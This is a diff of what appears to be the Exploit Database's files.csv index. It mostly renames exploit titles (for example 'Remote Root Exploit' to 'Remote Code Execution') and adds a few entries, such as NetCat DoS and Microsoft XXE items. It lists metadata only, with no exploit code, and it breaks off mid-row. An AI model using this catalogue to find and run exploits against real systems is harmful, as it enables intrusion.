diff --git a/files.csv b/files.csv index 658cff777..03a1c8685 100644 --- a/files.csv +++ b/files.csv @@ -737,8 +737,8 @@ id,file,description,date,author,platform,type,port 5709,platforms/windows/dos/5709.pl,"freeSSHd 1.2.1 - Remote Stack Overflow PoC Authenticated",2008-05-31,securfrog,windows,dos,0 5712,platforms/multiple/dos/5712.pl,"Samba 3.0.29 (client) - 'receive_smb_raw()' Buffer Overflow (PoC)",2008-06-01,"Guido Landi",multiple,dos,0 5718,platforms/windows/dos/5718.pl,"Alt-N SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (PoC)",2008-06-01,securfrog,windows,dos,0 -5727,platforms/windows/dos/5727.pl,"MDaemon 9.6.5 - Multiple Remote Buffer Overflow (PoC)",2008-06-02,securfrog,windows,dos,0 -5749,platforms/multiple/dos/5749.pl,"Asterisk - (SIP channel driver / in pedantic mode) Remote Crash",2008-06-05,"Armando Oliveira",multiple,dos,0 +5727,platforms/windows/dos/5727.pl,"Alt-N MDaemon 9.6.5 - Multiple Remote Buffer Overflow (PoC)",2008-06-02,securfrog,windows,dos,0 +5749,platforms/multiple/dos/5749.pl,"Asterisk 1.2.x - (SIP channel driver / in pedantic mode) Remote Crash",2008-06-05,"Armando Oliveira",multiple,dos,0 5814,platforms/linux/dos/5814.pl,"vsftpd 2.0.5 - (CWD) Authenticated Remote Memory Consumption Exploit",2008-06-14,"Praveen Darshanam",linux,dos,0 5817,platforms/windows/dos/5817.pl,"Dana IRC 1.3 - Remote Buffer Overflow (PoC)",2008-06-14,t0pP8uZz,windows,dos,0 5843,platforms/windows/dos/5843.html,"P2P Foxy - Out of Memory Denial of Service",2008-06-17,Styxosaurus,windows,dos,0 @@ -2221,7 +2221,7 @@ id,file,description,date,author,platform,type,port 19045,platforms/aix/dos/19045.txt,"SunOS 4.1.3 - kmem setgid /etc/crash Exploit",1993-02-03,anonymous,aix,dos,0 19046,platforms/aix/dos/19046.txt,"AppleShare IP Mail Server 5.0.3 - Buffer Overflow",1999-10-15,"Chris Wedgwood",aix,dos,0 19049,platforms/aix/dos/19049.txt,"BSDI 4.0 tcpmux / inetd - Crash",1998-04-07,"Mark Schaefer",aix,dos,0 -19064,platforms/hardware/dos/19064.txt,"F5 BIG-IP - Remote Root Authentication Bypass (1)",2012-06-11,"Florent Daigniere",hardware,dos,0 +19064,platforms/hardware/dos/19064.txt,"F5 BIG-IP - Authentication Bypass (1)",2012-06-11,"Florent Daigniere",hardware,dos,0 19075,platforms/linux/dos/19075.c,"APC PowerChute Plus 4.2.2 - Denial of Service",1998-04-10,Schlossnagle,linux,dos,0 19080,platforms/linux/dos/19080.txt,"Debian suidmanager 0.18 - Exploit",1998-04-28,"Thomas Roessler",linux,dos,0 19082,platforms/linux/dos/19082.txt,"AMD K6 Processor - Exploit",1998-06-01,Poulot-Cazajous,linux,dos,0 @@ -4984,7 +4984,7 @@ id,file,description,date,author,platform,type,port 39430,platforms/windows/dos/39430.txt,"Adobe Photoshop CC & Bridge CC - '.png' File Parsing Memory Corruption (2)",2016-02-09,"Francis Provencher",windows,dos,0 39431,platforms/windows/dos/39431.txt,"Adobe Photoshop CC & Bridge CC - '.iff' File Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0 39444,platforms/windows/dos/39444.txt,"Alternate Pic View 2.150 - '.pgm' Crash (PoC)",2016-02-15,"Shantanu Khandelwal",windows,dos,0 -39445,platforms/linux/dos/39445.c,"Ntpd ntp-4.2.6p5 - ctl_putdata() Buffer Overflow",2016-02-15,"Marcin Kozlowski",linux,dos,0 +39445,platforms/linux/dos/39445.c,"NTPd ntp-4.2.6p5 - ctl_putdata() Buffer Overflow",2016-02-15,"Marcin Kozlowski",linux,dos,0 39447,platforms/windows/dos/39447.py,"Network Scanner 4.0.0.0 - SEH Crash (PoC)",2016-02-15,INSECT.B,windows,dos,0 39452,platforms/windows/dos/39452.txt,"CyberCop Scanner Smbgrind 5.5 - Buffer Overflow",2016-02-16,hyp3rlinx,windows,dos,0 39454,platforms/linux/dos/39454.txt,"glibc - getaddrinfo Stack Based Buffer Overflow (1)",2016-02-16,"Google Security Research",linux,dos,0 @@ -5287,6 +5287,7 @@ id,file,description,date,author,platform,type,port 40843,platforms/windows/dos/40843.html,"Microsoft Internet Explorer 11 - MSHTML 'CGenerated­Content::Has­Generated­SVGMarker' Type Confusion",2016-11-28,Skylined,windows,dos,0 40844,platforms/windows/dos/40844.html,"Microsoft Internet Explorer 10 - MSHTML 'CEdit­Adorner::Detach' Use-After-Free (MS13-047)",2016-11-28,Skylined,windows,dos,0 40845,platforms/windows/dos/40845.txt,"Microsoft Internet Explorer 8/9/10/11 - MSHTML 'DOMImplementation' Type Confusion (MS16-009)",2016-11-28,Skylined,windows,dos,0 +40866,platforms/linux/dos/40866.py,"NetCat 0.7.1 - Denial of Service",2016-12-05,n30m1nd,linux,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -8673,12 +8674,15 @@ id,file,description,date,author,platform,type,port 40859,platforms/windows/local/40859.txt,"Microsoft Authorization Manager 6.1.7601 - 'azman' XML External Entity Injection",2016-12-04,hyp3rlinx,windows,local,0 40860,platforms/windows/local/40860.txt,"Microsoft Excel Starter 2010 - XML External Entity Injection",2016-12-04,hyp3rlinx,windows,local,0 40861,platforms/windows/local/40861.txt,"Microsoft Windows Media Center 6.1.7600 - 'ehshell.exe' XML External Entity Injection",2016-12-04,hyp3rlinx,windows,local,0 +40863,platforms/windows/local/40863.txt,"Microsoft Event Viewer 1.0 - XML External Entity Injection",2016-12-05,hyp3rlinx,windows,local,0 +40864,platforms/windows/local/40864.txt,"Microsoft MSINFO32.EXE 6.1.7601 - '.NFO' XML External Entity Injection",2016-12-05,hyp3rlinx,windows,local,0 +40865,platforms/windows/local/40865.txt,"Apache CouchDB 2.0.0 - Local Privilege Escalation",2016-12-05,hyp3rlinx,windows,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 7,platforms/linux/remote/7.pl,"Samba 2.2.x - Buffer Overflow",2003-04-07,"H D Moore",linux,remote,139 8,platforms/linux/remote/8.c,"SETI@home Clients - Buffer Overflow",2003-04-08,zillion,linux,remote,0 -10,platforms/linux/remote/10.c,"Samba 2.2.8 - Remote Root Exploit",2003-04-10,eSDee,linux,remote,139 +10,platforms/linux/remote/10.c,"Samba 2.2.8 - Remote Code Execution",2003-04-10,eSDee,linux,remote,139 16,platforms/linux/remote/16.c,"PoPToP PPTP 1.1.4-b3 - Remote Command Execution",2003-04-18,einstein,linux,remote,1723 18,platforms/linux/remote/18.sh,"Snort 1.9.1 - 'p7snort191.sh' Remote Command Execution",2003-04-23,truff,linux,remote,0 19,platforms/linux/remote/19.c,"PoPToP PPTP 1.1.4-b3 - 'poptop-sane.c' Remote Command Execution",2003-04-25,blightninjas,linux,remote,1723 @@ -8692,7 +8696,7 @@ id,file,description,date,author,platform,type,port 30,platforms/windows/remote/30.pl,"Snitz Forums 3.3.03 - Remote Command Execution",2003-05-12,anonymous,windows,remote,0 33,platforms/linux/remote/33.c,"WsMp3d 0.x - Heap Overflow",2003-05-22,Xpl017Elz,linux,remote,8000 34,platforms/linux/remote/34.pl,"Webfroot Shoutbox < 2.32 - (Apache) Remote Exploit",2003-05-29,anonymous,linux,remote,80 -36,platforms/windows/remote/36.c,"Microsoft Windows - WebDAV Remote Root Exploit (2)",2003-06-01,alumni,windows,remote,80 +36,platforms/windows/remote/36.c,"Microsoft Windows - WebDAV Remote Code Execution (2)",2003-06-01,alumni,windows,remote,80 37,platforms/windows/remote/37.pl,"Microsoft Internet Explorer - Object Tag Exploit (MS03-020)",2003-06-07,alumni,windows,remote,0 38,platforms/linux/remote/38.pl,"Apache 2.0.45 - APR Remote Exploit",2003-06-08,"Matthew Murphy",linux,remote,80 39,platforms/linux/remote/39.c,"Atftpd 0.6 - 'atftpdx.c' Remote Command Execution",2003-06-10,gunzip,linux,remote,69 @@ -8704,13 +8708,13 @@ id,file,description,date,author,platform,type,port 48,platforms/windows/remote/48.c,"Microsoft Windows Media Services - Remote Exploit (MS03-022)",2003-07-01,firew0rker,windows,remote,80 49,platforms/linux/remote/49.c,"Linux eXtremail 1.5.x - Remote Format Strings Exploit",2003-07-02,B-r00t,linux,remote,25 50,platforms/windows/remote/50.pl,"ColdFusion MX - Remote Development Service Exploit",2003-07-07,"angry packet",windows,remote,80 -51,platforms/windows/remote/51.c,"Microsoft IIS 5.0 - WebDAV Remote Root Exploit (3) (xwdav)",2003-07-08,Schizoprenic,windows,remote,80 +51,platforms/windows/remote/51.c,"Microsoft IIS 5.0 - WebDAV Remote Code Execution (3) (xwdav)",2003-07-08,Schizoprenic,windows,remote,80 54,platforms/windows/remote/54.c,"LeapWare LeapFTP 2.7.x - Remote Buffer Overflow",2003-07-12,drG4njubas,windows,remote,21 55,platforms/linux/remote/55.c,"Samba 2.2.8 - (Brute Force Method) Remote Command Execution",2003-07-13,Schizoprenic,linux,remote,139 56,platforms/windows/remote/56.c,"Microsoft Windows Media Services - 'nsiislog.dll' Remote Exploit",2003-07-14,anonymous,windows,remote,80 57,platforms/solaris/remote/57.txt,"Solaris 2.6/7/8 - (TTYPROMPT in.telnet) Remote Authentication Bypass",2002-11-02,"Jonathan S.",solaris,remote,0 58,platforms/linux/remote/58.c,"Citadel/UX BBS 6.07 - Remote Exploit",2003-07-17,"Carl Livitt",linux,remote,504 -63,platforms/linux/remote/63.c,"miniSQL (mSQL) 1.3 - Remote GID Root Exploit",2003-07-25,"the itch",linux,remote,1114 +63,platforms/linux/remote/63.c,"miniSQL (mSQL) 1.3 - GID Remote Code Execution",2003-07-25,"the itch",linux,remote,1114 64,platforms/windows/remote/64.c,"Microsoft Windows - 'RPC DCOM' Remote Buffer Overflow",2003-07-25,Flashsky,windows,remote,135 66,platforms/windows/remote/66.c,"Microsoft Windows Server 2000/XP - 'RPC DCOM' Remote Exploit (MS03-026)",2003-07-26,"H D Moore",windows,remote,135 67,platforms/multiple/remote/67.c,"Apache 1.3.x mod_mylo - Remote Code Execution",2003-07-28,"Carl Livitt",multiple,remote,80 @@ -8724,8 +8728,8 @@ id,file,description,date,author,platform,type,port 81,platforms/windows/remote/81.c,"Microsoft Windows 2000 - RSVP Server Authority Hijacking (PoC)",2003-08-15,"ste jones",windows,remote,0 83,platforms/windows/remote/83.html,"Microsoft Internet Explorer - Object Data Remote Exploit (MS03-032)",2003-08-21,malware,windows,remote,0 84,platforms/linux/remote/84.c,"Gopherd 3.0.5 - FTP Gateway Remote Overflow",2003-08-22,vade79,linux,remote,70 -86,platforms/multiple/remote/86.c,"Real Server 7/8/9 (Windows / Linux) - Remote Root Exploit",2003-08-25,"Johnny Cyberpunk",multiple,remote,554 -88,platforms/linux/remote/88.c,"GtkFtpd 1.0.4 - Remote Root Buffer Overflow",2003-08-28,vade79,linux,remote,21 +86,platforms/multiple/remote/86.c,"Real Server 7/8/9 (Windows / Linux) - Remote Code Execution",2003-08-25,"Johnny Cyberpunk",multiple,remote,554 +88,platforms/linux/remote/88.c,"GtkFtpd 1.0.4 - Buffer Overflow",2003-08-28,vade79,linux,remote,21 89,platforms/linux/remote/89.c,"Linux pam_lib_smb < 1.1.6 - /bin/login Remote Exploit",2003-08-29,vertex,linux,remote,23 90,platforms/windows/remote/90.c,"eMule/xMule/LMule - OP_SERVERMESSAGE Format String",2003-09-01,"Rémi Denis-Courmont",windows,remote,4661 92,platforms/windows/remote/92.c,"Microsoft WordPerfect Document Converter - Exploit (MS03-036)",2003-09-06,valgasu,windows,remote,0 @@ -8735,13 +8739,13 @@ id,file,description,date,author,platform,type,port 98,platforms/linux/remote/98.c,"MySQL 3.23.x/4.0.x - Remote Exploit",2003-09-14,bkbll,linux,remote,3306 99,platforms/linux/remote/99.c,"Pine 4.56 - Remote Buffer Overflow",2003-09-16,sorbo,linux,remote,0 100,platforms/windows/remote/100.c,"Microsoft Windows - 'RPC DCOM' Long Filename Overflow (MS03-026)",2003-09-16,ey4s,windows,remote,135 -101,platforms/solaris/remote/101.pl,"Solaris Sadmind - Default Configuration Remote Root Exploit",2003-09-19,"H D Moore",solaris,remote,111 -102,platforms/linux/remote/102.c,"Knox Arkeia Pro 5.1.12 - Backup Remote Root Exploit",2003-09-20,anonymous,linux,remote,617 +101,platforms/solaris/remote/101.pl,"Solaris Sadmind - Default Configuration Remote Code Execution",2003-09-19,"H D Moore",solaris,remote,111 +102,platforms/linux/remote/102.c,"Knox Arkeia Pro 5.1.12 - Backup Remote Code Execution",2003-09-20,anonymous,linux,remote,617 103,platforms/windows/remote/103.c,"Microsoft Windows - 'RPC DCOM2' Remote Exploit (MS03-039)",2003-09-20,Flashsky,windows,remote,135 105,platforms/bsd/remote/105.pl,"GNU CFEngine 2.-2.0.3 - Remote Stack Overflow",2003-09-27,kokanin,bsd,remote,5308 -107,platforms/linux/remote/107.c,"ProFTPd 1.2.9rc2 - ASCII File Remote Root Exploit",2003-10-04,bkbll,linux,remote,21 +107,platforms/linux/remote/107.c,"ProFTPd 1.2.9rc2 - ASCII File Remote Code Execution",2003-10-04,bkbll,linux,remote,21 109,platforms/windows/remote/109.c,"Microsoft Windows - 'RPC2' Universal Exploit / Denial of Service (RPC3) (MS03-039)",2003-10-09,anonymous,windows,remote,135 -110,platforms/linux/remote/110.c,"ProFTPd 1.2.7 < 1.2.9rc2 - Remote Root / Brute Force Exploit",2003-10-13,Haggis,linux,remote,21 +110,platforms/linux/remote/110.c,"ProFTPd 1.2.7 < 1.2.9rc2 - Remote Code Execution / Brute Force",2003-10-13,Haggis,linux,remote,21 112,platforms/windows/remote/112.c,"mIRC 6.1 - 'IRC' Protocol Remote Buffer Overflow",2003-10-21,blasty,windows,remote,0 116,platforms/windows/remote/116.c,"NIPrint LPD-LPR Print Server 4.10 - Remote Exploit",2003-11-04,xCrZx,windows,remote,515 117,platforms/windows/remote/117.c,"Microsoft Windows 2000/XP - RPC Remote (Non Exec Memory) Exploit",2003-11-07,ins1der,windows,remote,135 @@ -8756,7 +8760,7 @@ id,file,description,date,author,platform,type,port 133,platforms/windows/remote/133.pl,"Eznet 3.5.0 - Remote Stack Overflow / Denial of Service",2003-12-15,"Peter Winter-Smith",windows,remote,80 135,platforms/windows/remote/135.c,"Microsoft Windows Messenger Service - Remote Exploit FR (MS03-043)",2003-12-16,MrNice,windows,remote,135 136,platforms/windows/remote/136.pl,"Eznet 3.5.0 - Remote Stack Overflow Universal Exploit",2003-12-18,kralor,windows,remote,80 -139,platforms/linux/remote/139.c,"Cyrus IMSPD 1.7 - abook_dbname Remote Root Exploit",2003-12-27,SpikE,linux,remote,406 +139,platforms/linux/remote/139.c,"Cyrus IMSPD 1.7 - 'abook_dbname' Remote Code Execution",2003-12-27,SpikE,linux,remote,406 143,platforms/linux/remote/143.c,"lftp 2.6.9 - Remote Stack based Overflow",2004-01-14,Li0n7,linux,remote,0 149,platforms/windows/remote/149.c,"RhinoSoft Serv-U FTPd Server 3.x/4.x - 'SITE CHMOD' Command Remote Exploit",2004-01-27,lion,windows,remote,21 151,platforms/windows/remote/151.txt,"Microsoft Internet Explorer - URL Injection in History List (MS04-004)",2004-02-04,"Andreas Sandblad",windows,remote,0 @@ -8769,12 +8773,12 @@ id,file,description,date,author,platform,type,port 164,platforms/windows/remote/164.c,"Foxmail 5.0 - 'PunyLib.dll' Remote Stack Overflow",2004-03-23,xfocus,windows,remote,0 165,platforms/windows/remote/165.c,"Ipswitch WS_FTP Server 4.0.2 - ALLO Remote Buffer Overflow",2004-03-23,"Hugh Mann",windows,remote,21 166,platforms/windows/remote/166.pl,"eSignal 7.6 - STREAMQUOTE Remote Buffer Overflow",2004-03-26,VizibleSoft,windows,remote,80 -167,platforms/linux/remote/167.c,"Ethereal 0.10.0 < 0.10.2 - IGAP Overflow Remote Root Exploit",2004-03-28,"Abhisek Datta",linux,remote,0 +167,platforms/linux/remote/167.c,"Ethereal 0.10.0 < 0.10.2 - IGAP Overflow",2004-03-28,"Abhisek Datta",linux,remote,0 168,platforms/windows/remote/168.c,"RealSecure / Blackice - 'iss_pam1.dll' Remote Overflow",2004-03-28,Sam,windows,remote,0 169,platforms/hardware/remote/169.pl,"Multiple Cisco Products - Cisco Global Exploiter Tool",2004-03-28,blackangels,hardware,remote,0 171,platforms/linux/remote/171.c,"tcpdump - ISAKMP Identification payload Integer Overflow",2004-04-05,Rapid7,linux,remote,0 -173,platforms/linux/remote/173.pl,"Monit 4.1 - Remote Root Buffer Overflow",2004-04-09,gsicht,linux,remote,2812 -174,platforms/linux/remote/174.c,"Monit 4.2 - Remote Root Buffer Overflow",2004-04-12,"Abhisek Datta",linux,remote,2812 +173,platforms/linux/remote/173.pl,"Monit 4.1 - Buffer Overflow",2004-04-09,gsicht,linux,remote,2812 +174,platforms/linux/remote/174.c,"Monit 4.2 - Buffer Overflow",2004-04-12,"Abhisek Datta",linux,remote,2812 175,platforms/windows/remote/175.pl,"eMule 0.42d - IRC Remote Buffer Overflow",2004-04-12,kingcope,windows,remote,0 181,platforms/linux/remote/181.c,"Half Life - (rcon) Remote Buffer Overflow",2000-11-16,"Sao Paulo",linux,remote,27015 189,platforms/windows/remote/189.c,"Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (6)",2000-11-18,incubus,windows,remote,80 @@ -8783,13 +8787,13 @@ id,file,description,date,author,platform,type,port 192,platforms/windows/remote/192.pl,"Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (8)",2000-11-18,"Roelof Temmingh",windows,remote,80 201,platforms/multiple/remote/201.c,"WU-FTPD 2.6.0 - Remote Command Execution",2000-11-21,venglin,multiple,remote,21 204,platforms/linux/remote/204.c,"BFTPd - vsprintf() Format Strings Exploit",2000-11-29,DiGiT,linux,remote,21 -208,platforms/linux/remote/208.c,"INND/NNRP < 1.6.x - Remote Root Overflow",2000-11-30,"Babcia Padlina",linux,remote,119 +208,platforms/linux/remote/208.c,"INND/NNRP < 1.6.x - Overflow Exploit",2000-11-30,"Babcia Padlina",linux,remote,119 211,platforms/cgi/remote/211.c,"PHF (Linux/x86) - Buffer Overflow",2000-12-01,proton,cgi,remote,0 213,platforms/solaris/remote/213.c,"Solaris sadmind - Remote Buffer Overflow",2000-12-01,Optyx,solaris,remote,111 220,platforms/linux/remote/220.c,"PHP 3.0.16/4.0.2 - Remote Format Overflow",2000-12-06,Gneisenau,linux,remote,80 225,platforms/linux/remote/225.c,"BFTPd 1.0.12 - Remote Exploit",2000-12-11,korty,linux,remote,21 226,platforms/linux/remote/226.c,"LPRng 3.6.22/23/24 - Remote Command Execution",2000-12-11,sk8,linux,remote,515 -227,platforms/linux/remote/227.c,"LPRng (RedHat 7.0) - lpd Remote Root Format String",2000-12-11,DiGiT,linux,remote,515 +227,platforms/linux/remote/227.c,"LPRng (RedHat 7.0) - 'lpd' Format String",2000-12-11,DiGiT,linux,remote,515 228,platforms/bsd/remote/228.c,"Oops! 1.4.6 - (one russi4n proxy-server) Heap Buffer Overflow",2000-12-15,diman,bsd,remote,3128 230,platforms/linux/remote/230.c,"LPRng 3.6.24-1 - Remote Command Execution",2000-12-15,VeNoMouS,linux,remote,515 232,platforms/windows/remote/232.c,"Check Point VPN-1/FireWall-1 4.1 SP2 - Blocked Port Bypass Exploit",2000-12-19,Unknown,windows,remote,0 @@ -8801,20 +8805,20 @@ id,file,description,date,author,platform,type,port 263,platforms/solaris/remote/263.pl,"Netscape Enterprise Server 4.0/sparc/SunOS 5.7 - Remote Exploit",2001-01-27,Fyodor,solaris,remote,80 266,platforms/windows/remote/266.c,"Microsoft Windows 2000 SP1/SP2 - isapi .printer Extension Overflow (1)",2001-05-07,"Ryan Permeh",windows,remote,80 268,platforms/windows/remote/268.c,"Microsoft Windows 2000 SP1/SP2 - isapi .printer Extension Overflow (2)",2001-05-08,"dark spyrit",windows,remote,80 -269,platforms/linux/remote/269.c,"BeroFTPD 1.3.4(1) (Linux/x86) - Remote Root Exploit",2001-05-08,qitest1,linux,remote,21 +269,platforms/linux/remote/269.c,"BeroFTPD 1.3.4(1) (Linux/x86) - Remote Code Execution",2001-05-08,qitest1,linux,remote,21 275,platforms/windows/remote/275.c,"Microsoft IIS 5.0 - SSL Remote Buffer Overflow (MS04-011)",2004-04-21,"Johnny Cyberpunk",windows,remote,443 -277,platforms/linux/remote/277.c,"BIND 8.2.x - (TSIG) Remote Root Stack Overflow (1)",2001-03-01,Gneisenau,linux,remote,53 -279,platforms/linux/remote/279.c,"BIND 8.2.x - (TSIG) Remote Root Stack Overflow (2)",2001-03-01,LSD-PLaNET,linux,remote,53 -280,platforms/solaris/remote/280.c,"BIND 8.2.x - (TSIG) Remote Root Stack Overflow (3)",2001-03-01,LSD-PLaNET,solaris,remote,53 -282,platforms/linux/remote/282.c,"BIND 8.2.x - (TSIG) Remote Root Stack Overflow (4)",2001-03-02,multiple,linux,remote,53 +277,platforms/linux/remote/277.c,"BIND 8.2.x - (TSIG) Stack Overflow (1)",2001-03-01,Gneisenau,linux,remote,53 +279,platforms/linux/remote/279.c,"BIND 8.2.x - (TSIG) Stack Overflow (2)",2001-03-01,LSD-PLaNET,linux,remote,53 +280,platforms/solaris/remote/280.c,"BIND 8.2.x - (TSIG) Stack Overflow (3)",2001-03-01,LSD-PLaNET,solaris,remote,53 +282,platforms/linux/remote/282.c,"BIND 8.2.x - (TSIG) Stack Overflow (4)",2001-03-02,multiple,linux,remote,53 284,platforms/linux/remote/284.c,"IMAP4rev1 12.261/12.264/2000.284 - (lsub) Remote Exploit",2001-03-03,SkyLaZarT,linux,remote,143 291,platforms/linux/remote/291.c,"TCP Connection Reset - Remote Exploit",2004-04-23,"Paul A. Watson",linux,remote,0 293,platforms/windows/remote/293.c,"Microsoft Windows - 'Lsasrv.dll' RPC Remote Buffer Overflow (MS04-011)",2004-04-24,sbaa,windows,remote,445 -294,platforms/hardware/remote/294.pl,"HP Web JetAdmin 6.5 - (connectedNodes.ovpl) Remote Root Exploit",2004-04-28,FX,hardware,remote,8000 +294,platforms/hardware/remote/294.pl,"HP Web JetAdmin 6.5 - 'connectedNodes.ovpl' Remote Code Execution",2004-04-28,FX,hardware,remote,8000 295,platforms/windows/remote/295.c,"Microsoft Windows Server 2000/XP - 'Lsasrv.dll' Remote Universal Exploit (MS04-011)",2004-04-29,houseofdabus,windows,remote,445 296,platforms/linux/remote/296.c,"XChat 1.8.0/2.0.8 socks5 - Remote Buffer Overflow",2004-05-05,vade79,linux,remote,0 297,platforms/windows/remote/297.c,"Sasser Worm ftpd - Remote Buffer Overflow (port 5554)",2004-05-16,mandragore,windows,remote,5554 -300,platforms/multiple/remote/300.c,"CVS (Linux/FreeBSD) - Remote Entry Line Heap Overflow Root Exploit",2004-06-25,Ac1dB1tCh3z,multiple,remote,2401 +300,platforms/multiple/remote/300.c,"CVS (Linux/FreeBSD) - Remote Entry Line Heap Overflow",2004-06-25,Ac1dB1tCh3z,multiple,remote,2401 301,platforms/solaris/remote/301.c,"CVS - Remote Entry Line Root Heap Overflow",2004-06-25,anonymous,solaris,remote,2401 303,platforms/linux/remote/303.pl,"Borland Interbase 7.x - Remote Exploit",2004-06-25,"Aviram Jenik",linux,remote,3050 304,platforms/linux/remote/304.c,"Subversion 1.0.2 - svn_time_from_cstring() Remote Exploit",2004-06-25,"Gyan Chawdhary",linux,remote,3690 @@ -8826,11 +8830,11 @@ id,file,description,date,author,platform,type,port 315,platforms/windows/remote/315.txt,"Microsoft Outlook Express - JavaScript Execution",2004-07-13,anonymous,windows,remote,0 316,platforms/windows/remote/316.txt,"Microsoft Internet Explorer - Remote Wscript.Shell Exploit",2004-07-13,"Ferruh Mavituna",windows,remote,0 340,platforms/linux/remote/340.c,"Linux imapd - Remote Overflow File Retrieve Exploit",1997-06-24,p1,linux,remote,143 -346,platforms/linux/remote/346.c,"Solaris /bin/login (SPARC/x86) - Remote Root Exploit",2001-12-20,Teso,linux,remote,23 +346,platforms/linux/remote/346.c,"Solaris /bin/login (SPARC/x86) - Remote Code Execution",2001-12-20,Teso,linux,remote,23 347,platforms/linux/remote/347.c,"Squid 2.4.1 - Remote Buffer Overflow",2002-05-14,Teso,linux,remote,0 348,platforms/linux/remote/348.c,"WU-FTPD 2.6.1 - Remote Command Execution",2002-05-14,Teso,linux,remote,21 349,platforms/multiple/remote/349.txt,"SSH (x2) - Remote Command Execution",2002-05-01,Teso,multiple,remote,22 -359,platforms/linux/remote/359.c,"Drcat 0.5.0-beta - (drcatd) Remote Root Exploit",2004-07-22,Taif,linux,remote,3535 +359,platforms/linux/remote/359.c,"Drcat 0.5.0-beta - 'drcatd' Remote Code Execution",2004-07-22,Taif,linux,remote,3535 361,platforms/windows/remote/361.txt,"Flash FTP Server - Directory Traversal",2004-07-22,CoolICE,windows,remote,0 364,platforms/linux/remote/364.pl,"Samba 3.0.4 SWAT - Authorisation Buffer Overflow",2004-07-22,"Noam Rathaus",linux,remote,901 372,platforms/linux/remote/372.c,"OpenFTPd 0.30.2 - Remote Exploit",2004-08-03,Andi,linux,remote,21 @@ -8840,10 +8844,10 @@ id,file,description,date,author,platform,type,port 380,platforms/linux/remote/380.c,"Pavuk Digest - Authentication Buffer Overflow Remote Exploit",2004-08-08,infamous41md,linux,remote,80 382,platforms/linux/remote/382.c,"Melange Chat Server 1.10 - Remote Buffer Overflow",2002-12-24,innerphobia,linux,remote,0 386,platforms/linux/remote/386.c,"xine 0.99.2 - Remote Stack Overflow",2004-08-09,c0ntex,linux,remote,80 -387,platforms/linux/remote/387.c,"Dropbear SSH 0.34 - Remote Root Exploit",2004-08-09,livenn,linux,remote,22 +387,platforms/linux/remote/387.c,"Dropbear SSH 0.34 - Remote Code Execution",2004-08-09,livenn,linux,remote,22 389,platforms/linux/remote/389.c,"LibPNG Graphics Library - Remote Buffer Overflow",2004-08-11,infamous41md,linux,remote,0 390,platforms/linux/remote/390.c,"GV PostScript Viewer - Remote Buffer Overflow (1)",2004-08-13,infamous41md,linux,remote,0 -391,platforms/osx/remote/391.pl,"Apple Mac OSX 10.3.3 - AppleFileServer Remote Root Overflow",2004-08-13,"Dino Dai Zovi",osx,remote,548 +391,platforms/osx/remote/391.pl,"Apple Mac OSX 10.3.3 - AppleFileServer Overflow Remote Code Execution",2004-08-13,"Dino Dai Zovi",osx,remote,548 392,platforms/linux/remote/392.c,"Remote CVS 1.11.15 - (error_prog_name) Remote Exploit",2004-08-13,"Gyan Chawdhary",linux,remote,2401 397,platforms/linux/remote/397.c,"WU-IMAP 2000.287(1-2) - Remote Exploit",2002-06-25,Teso,linux,remote,143 398,platforms/linux/remote/398.c,"rsync 2.5.1 - Remote Exploit (1)",2002-01-01,Teso,linux,remote,873 @@ -8876,7 +8880,7 @@ id,file,description,date,author,platform,type,port 572,platforms/windows/remote/572.pl,"Eudora 6.2.0.7 - Attachment Spoofer Exploit",2004-10-11,"Paul Szabo",windows,remote,0 573,platforms/windows/remote/573.c,"Icecast 2.0.1 (Win32) - Remote Code Execution (2)",2004-10-12,K-C0d3r,windows,remote,8000 577,platforms/windows/remote/577.c,"YahooPOPs 1.6 - SMTP Port Buffer Overflow",2004-10-15,class101,windows,remote,25 -580,platforms/linux/remote/580.c,"Monit 4.2 - Basic Authentication Remote Root Exploit",2004-10-17,rtk,linux,remote,2812 +580,platforms/linux/remote/580.c,"Monit 4.2 - Basic Authentication Remote Code Execution",2004-10-17,rtk,linux,remote,2812 581,platforms/linux/remote/581.c,"ProFTPd 1.2.10 - Remote Users Enumeration Exploit",2004-10-17,"Leon Juranic",linux,remote,0 582,platforms/windows/remote/582.c,"YahooPOPs 1.6 - SMTP Remote Buffer Overflow",2004-10-18,"Diabolic Crab",windows,remote,25 583,platforms/windows/remote/583.pl,"SLX Server 6.1 - Arbitrary File Creation (PoC)",2004-10-18,"Carl Livitt",windows,remote,0 @@ -8886,13 +8890,13 @@ id,file,description,date,author,platform,type,port 590,platforms/windows/remote/590.c,"ShixxNOTE 6.net - Remote Buffer Overflow",2004-10-22,class101,windows,remote,2000 592,platforms/windows/remote/592.py,"Ability Server 2.34 - (APPE) Remote Buffer Overflow",2004-10-23,KaGra,windows,remote,21 598,platforms/windows/remote/598.py,"TABS MailCarrier 2.51 - SMTP EHLO / HELO Buffer Overflow",2004-10-26,muts,windows,remote,25 -608,platforms/linux/remote/608.c,"WvTFTPd 0.9 - Remote Root Heap Overflow",2004-10-28,infamous41md,linux,remote,69 +608,platforms/linux/remote/608.c,"WvTFTPd 0.9 - Heap Overflow",2004-10-28,infamous41md,linux,remote,69 609,platforms/linux/remote/609.txt,"zgv 5.5 - Multiple Arbitrary Code Execution (PoC)",2004-10-28,infamous41md,linux,remote,0 612,platforms/windows/remote/612.html,"Microsoft Internet Explorer 6 - (IFRAME Tag) Buffer Overflow",2004-11-02,Skylined,windows,remote,0 616,platforms/windows/remote/616.c,"MiniShare 1.4.1 - Remote Buffer Overflow (1)",2004-11-07,class101,windows,remote,80 618,platforms/windows/remote/618.c,"Ability Server 